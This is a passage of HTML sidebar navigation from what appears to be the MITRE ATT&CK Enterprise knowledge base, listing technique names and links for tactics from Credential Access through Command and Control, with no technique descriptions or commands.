</div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1557-T1557.002"> <a href="/versions/v9/techniques/T1557/002/"> ARP Cache Poisoning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1556-body" aria-labelledby="enterprise-TA0006-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1040"> <a href="/versions/v9/techniques/T1040/"> Network Sniffing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1003"> <a href="/versions/v9/techniques/T1003/"> OS Credential Dumping </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1003-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1003-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1003-body"></div> </div> <div class="sidenav-body collapse" 
id="enterprise-TA0006-T1003-body" aria-labelledby="enterprise-TA0006-T1003-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.001"> <a href="/versions/v9/techniques/T1003/001/"> LSASS Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.002"> <a href="/versions/v9/techniques/T1003/002/"> Security Account Manager </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.003"> <a href="/versions/v9/techniques/T1003/003/"> NTDS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.004"> <a href="/versions/v9/techniques/T1003/004/"> LSA Secrets </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.005"> <a href="/versions/v9/techniques/T1003/005/"> Cached Domain Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.006"> <a href="/versions/v9/techniques/T1003/006/"> DCSync </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.007"> <a href="/versions/v9/techniques/T1003/007/"> Proc Filesystem </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1003-T1003.008"> <a href="/versions/v9/techniques/T1003/008/"> /etc/passwd and /etc/shadow </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1528"> <a href="/versions/v9/techniques/T1528/"> Steal Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1558"> <a href="/versions/v9/techniques/T1558/"> Steal or Forge Kerberos Tickets </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1558-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1558-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1558-body"></div> 
</div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1558-body" aria-labelledby="enterprise-TA0006-T1558-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.001"> <a href="/versions/v9/techniques/T1558/001/"> Golden Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.002"> <a href="/versions/v9/techniques/T1558/002/"> Silver Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.003"> <a href="/versions/v9/techniques/T1558/003/"> Kerberoasting </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1558-T1558.004"> <a href="/versions/v9/techniques/T1558/004/"> AS-REP Roasting </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1539"> <a href="/versions/v9/techniques/T1539/"> Steal Web Session Cookie </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1111"> <a href="/versions/v9/techniques/T1111/"> Two-Factor Authentication Interception </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1552"> <a href="/versions/v9/techniques/T1552/"> Unsecured Credentials </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1552-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1552-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1552-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1552-body" aria-labelledby="enterprise-TA0006-T1552-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.001"> <a href="/versions/v9/techniques/T1552/001/"> Credentials In Files </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.002"> <a href="/versions/v9/techniques/T1552/002/"> Credentials in Registry </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.003"> <a href="/versions/v9/techniques/T1552/003/"> Bash History </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.004"> <a href="/versions/v9/techniques/T1552/004/"> Private Keys </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.005"> <a href="/versions/v9/techniques/T1552/005/"> Cloud Instance Metadata API </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.006"> <a href="/versions/v9/techniques/T1552/006/"> Group Policy Preferences </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1552-T1552.007"> <a href="/versions/v9/techniques/T1552/007/"> Container API </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007"> <a href="/versions/v9/tactics/TA0007"> Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-header" data-toggle="collapse" data-target="#enterprise-TA0007-body" aria-expanded="false" aria-controls="#enterprise-TA0007-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-body" aria-labelledby="enterprise-TA0007-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1087"> <a href="/versions/v9/techniques/T1087/"> Account Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1087-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1087-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1087-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1087-body" aria-labelledby="enterprise-TA0007-T1087-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.001"> <a href="/versions/v9/techniques/T1087/001/"> Local Account </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0007-T1087-T1087.002"> <a href="/versions/v9/techniques/T1087/002/"> Domain Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.003"> <a href="/versions/v9/techniques/T1087/003/"> Email Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1087-T1087.004"> <a href="/versions/v9/techniques/T1087/004/"> Cloud Account </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1010"> <a href="/versions/v9/techniques/T1010/"> Application Window Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1217"> <a href="/versions/v9/techniques/T1217/"> Browser Bookmark Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1580"> <a href="/versions/v9/techniques/T1580/"> Cloud Infrastructure Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1538"> <a href="/versions/v9/techniques/T1538/"> Cloud Service Dashboard </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1526"> <a href="/versions/v9/techniques/T1526/"> Cloud Service Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1613"> <a href="/versions/v9/techniques/T1613/"> Container and Resource Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1482"> <a href="/versions/v9/techniques/T1482/"> Domain Trust Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1083"> <a href="/versions/v9/techniques/T1083/"> File and Directory Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1046"> <a href="/versions/v9/techniques/T1046/"> Network Service Scanning </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1135"> <a href="/versions/v9/techniques/T1135/"> Network Share Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1040"> <a href="/versions/v9/techniques/T1040/"> Network Sniffing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1201"> <a href="/versions/v9/techniques/T1201/"> Password Policy Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1120"> <a href="/versions/v9/techniques/T1120/"> Peripheral Device Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1069"> <a href="/versions/v9/techniques/T1069/"> Permission Groups Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1069-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1069-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1069-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1069-body" aria-labelledby="enterprise-TA0007-T1069-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.001"> <a href="/versions/v9/techniques/T1069/001/"> Local Groups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.002"> <a href="/versions/v9/techniques/T1069/002/"> Domain Groups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1069-T1069.003"> <a href="/versions/v9/techniques/T1069/003/"> Cloud Groups </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1057"> <a href="/versions/v9/techniques/T1057/"> Process Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1012"> <a href="/versions/v9/techniques/T1012/"> Query Registry </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0007-T1018"> <a href="/versions/v9/techniques/T1018/"> Remote System Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1518"> <a href="/versions/v9/techniques/T1518/"> Software Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1518-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1518-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1518-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1518-body" aria-labelledby="enterprise-TA0007-T1518-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1518-T1518.001"> <a href="/versions/v9/techniques/T1518/001/"> Security Software Discovery </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1082"> <a href="/versions/v9/techniques/T1082/"> System Information Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1614"> <a href="/versions/v9/techniques/T1614/"> System Location Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1016"> <a href="/versions/v9/techniques/T1016/"> System Network Configuration Discovery </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1016-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1016-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1016-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1016-body" aria-labelledby="enterprise-TA0007-T1016-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1016-T1016.001"> <a href="/versions/v9/techniques/T1016/001/"> Internet Connection Discovery </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1049"> <a href="/versions/v9/techniques/T1049/"> System Network Connections 
Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1033"> <a href="/versions/v9/techniques/T1033/"> System Owner/User Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1007"> <a href="/versions/v9/techniques/T1007/"> System Service Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1124"> <a href="/versions/v9/techniques/T1124/"> System Time Discovery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0007-T1497"> <a href="/versions/v9/techniques/T1497/"> Virtualization/Sandbox Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0007-T1497-header" data-toggle="collapse" data-target="#enterprise-TA0007-T1497-body" aria-expanded="false" aria-controls="#enterprise-TA0007-T1497-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0007-T1497-body" aria-labelledby="enterprise-TA0007-T1497-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.001"> <a href="/versions/v9/techniques/T1497/001/"> System Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.002"> <a href="/versions/v9/techniques/T1497/002/"> User Activity Based Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0007-T1497-T1497.003"> <a href="/versions/v9/techniques/T1497/003/"> Time Based Evasion </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008"> <a href="/versions/v9/tactics/TA0008"> Lateral Movement </a> <div class="expand-button collapsed" id="enterprise-TA0008-header" data-toggle="collapse" data-target="#enterprise-TA0008-body" aria-expanded="false" aria-controls="#enterprise-TA0008-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-body" 
aria-labelledby="enterprise-TA0008-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1210"> <a href="/versions/v9/techniques/T1210/"> Exploitation of Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1534"> <a href="/versions/v9/techniques/T1534/"> Internal Spearphishing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1570"> <a href="/versions/v9/techniques/T1570/"> Lateral Tool Transfer </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1563"> <a href="/versions/v9/techniques/T1563/"> Remote Service Session Hijacking </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1563-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1563-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1563-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1563-body" aria-labelledby="enterprise-TA0008-T1563-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1563-T1563.001"> <a href="/versions/v9/techniques/T1563/001/"> SSH Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1563-T1563.002"> <a href="/versions/v9/techniques/T1563/002/"> RDP Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1021"> <a href="/versions/v9/techniques/T1021/"> Remote Services </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1021-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1021-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1021-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1021-body" aria-labelledby="enterprise-TA0008-T1021-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.001"> <a 
href="/versions/v9/techniques/T1021/001/"> Remote Desktop Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.002"> <a href="/versions/v9/techniques/T1021/002/"> SMB/Windows Admin Shares </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.003"> <a href="/versions/v9/techniques/T1021/003/"> Distributed Component Object Model </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.004"> <a href="/versions/v9/techniques/T1021/004/"> SSH </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.005"> <a href="/versions/v9/techniques/T1021/005/"> VNC </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1021-T1021.006"> <a href="/versions/v9/techniques/T1021/006/"> Windows Remote Management </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1091"> <a href="/versions/v9/techniques/T1091/"> Replication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1072"> <a href="/versions/v9/techniques/T1072/"> Software Deployment Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1080"> <a href="/versions/v9/techniques/T1080/"> Taint Shared Content </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0008-T1550"> <a href="/versions/v9/techniques/T1550/"> Use Alternate Authentication Material </a> <div class="expand-button collapsed" id="enterprise-TA0008-T1550-header" data-toggle="collapse" data-target="#enterprise-TA0008-T1550-body" aria-expanded="false" aria-controls="#enterprise-TA0008-T1550-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0008-T1550-body" aria-labelledby="enterprise-TA0008-T1550-header"> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0008-T1550-T1550.001"> <a href="/versions/v9/techniques/T1550/001/"> Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.002"> <a href="/versions/v9/techniques/T1550/002/"> Pass the Hash </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.003"> <a href="/versions/v9/techniques/T1550/003/"> Pass the Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0008-T1550-T1550.004"> <a href="/versions/v9/techniques/T1550/004/"> Web Session Cookie </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009"> <a href="/versions/v9/tactics/TA0009"> Collection </a> <div class="expand-button collapsed" id="enterprise-TA0009-header" data-toggle="collapse" data-target="#enterprise-TA0009-body" aria-expanded="false" aria-controls="#enterprise-TA0009-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-body" aria-labelledby="enterprise-TA0009-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1560"> <a href="/versions/v9/techniques/T1560/"> Archive Collected Data </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1560-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1560-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1560-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1560-body" aria-labelledby="enterprise-TA0009-T1560-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1560-T1560.001"> <a href="/versions/v9/techniques/T1560/001/"> Archive via Utility </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1560-T1560.002"> <a href="/versions/v9/techniques/T1560/002/"> Archive via Library </a> </div> </div> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0009-T1560-T1560.003"> <a href="/versions/v9/techniques/T1560/003/"> Archive via Custom Method </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1123"> <a href="/versions/v9/techniques/T1123/"> Audio Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1119"> <a href="/versions/v9/techniques/T1119/"> Automated Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1115"> <a href="/versions/v9/techniques/T1115/"> Clipboard Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1530"> <a href="/versions/v9/techniques/T1530/"> Data from Cloud Storage Object </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1602"> <a href="/versions/v9/techniques/T1602/"> Data from Configuration Repository </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1602-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1602-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1602-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1602-body" aria-labelledby="enterprise-TA0009-T1602-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1602-T1602.001"> <a href="/versions/v9/techniques/T1602/001/"> SNMP (MIB Dump) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1602-T1602.002"> <a href="/versions/v9/techniques/T1602/002/"> Network Device Configuration Dump </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1213"> <a href="/versions/v9/techniques/T1213/"> Data from Information Repositories </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1213-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1213-body" aria-expanded="false" 
aria-controls="#enterprise-TA0009-T1213-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1213-body" aria-labelledby="enterprise-TA0009-T1213-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1213-T1213.001"> <a href="/versions/v9/techniques/T1213/001/"> Confluence </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1213-T1213.002"> <a href="/versions/v9/techniques/T1213/002/"> Sharepoint </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1005"> <a href="/versions/v9/techniques/T1005/"> Data from Local System </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1039"> <a href="/versions/v9/techniques/T1039/"> Data from Network Shared Drive </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1025"> <a href="/versions/v9/techniques/T1025/"> Data from Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1074"> <a href="/versions/v9/techniques/T1074/"> Data Staged </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1074-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1074-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1074-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1074-body" aria-labelledby="enterprise-TA0009-T1074-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1074-T1074.001"> <a href="/versions/v9/techniques/T1074/001/"> Local Data Staging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1074-T1074.002"> <a href="/versions/v9/techniques/T1074/002/"> Remote Data Staging </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1114"> <a href="/versions/v9/techniques/T1114/"> Email Collection </a> 
<div class="expand-button collapsed" id="enterprise-TA0009-T1114-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1114-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1114-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1114-body" aria-labelledby="enterprise-TA0009-T1114-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.001"> <a href="/versions/v9/techniques/T1114/001/"> Local Email Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.002"> <a href="/versions/v9/techniques/T1114/002/"> Remote Email Collection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1114-T1114.003"> <a href="/versions/v9/techniques/T1114/003/"> Email Forwarding Rule </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1056"> <a href="/versions/v9/techniques/T1056/"> Input Capture </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1056-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1056-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1056-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1056-body" aria-labelledby="enterprise-TA0009-T1056-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.001"> <a href="/versions/v9/techniques/T1056/001/"> Keylogging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.002"> <a href="/versions/v9/techniques/T1056/002/"> GUI Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.003"> <a href="/versions/v9/techniques/T1056/003/"> Web Portal Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1056-T1056.004"> <a 
href="/versions/v9/techniques/T1056/004/"> Credential API Hooking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1185"> <a href="/versions/v9/techniques/T1185/"> Man in the Browser </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0009-T1557"> <a href="/versions/v9/techniques/T1557/"> Man-in-the-Middle </a> <div class="expand-button collapsed" id="enterprise-TA0009-T1557-header" data-toggle="collapse" data-target="#enterprise-TA0009-T1557-body" aria-expanded="false" aria-controls="#enterprise-TA0009-T1557-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0009-T1557-body" aria-labelledby="enterprise-TA0009-T1557-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1557-T1557.001"> <a href="/versions/v9/techniques/T1557/001/"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1557-T1557.002"> <a href="/versions/v9/techniques/T1557/002/"> ARP Cache Poisoning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1113"> <a href="/versions/v9/techniques/T1113/"> Screen Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0009-T1125"> <a href="/versions/v9/techniques/T1125/"> Video Capture </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011"> <a href="/versions/v9/tactics/TA0011"> Command and Control </a> <div class="expand-button collapsed" id="enterprise-TA0011-header" data-toggle="collapse" data-target="#enterprise-TA0011-body" aria-expanded="false" aria-controls="#enterprise-TA0011-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-body" aria-labelledby="enterprise-TA0011-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1071"> <a 
href="/versions/v9/techniques/T1071/"> Application Layer Protocol </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1071-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1071-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1071-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1071-body" aria-labelledby="enterprise-TA0011-T1071-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.001"> <a href="/versions/v9/techniques/T1071/001/"> Web Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.002"> <a href="/versions/v9/techniques/T1071/002/"> File Transfer Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.003"> <a href="/versions/v9/techniques/T1071/003/"> Mail Protocols </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1071-T1071.004"> <a href="/versions/v9/techniques/T1071/004/"> DNS </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1092"> <a href="/versions/v9/techniques/T1092/"> Communication Through Removable Media </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1132"> <a href="/versions/v9/techniques/T1132/"> Data Encoding </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1132-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1132-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1132-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1132-body" aria-labelledby="enterprise-TA0011-T1132-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1132-T1132.001"> <a href="/versions/v9/techniques/T1132/001/"> 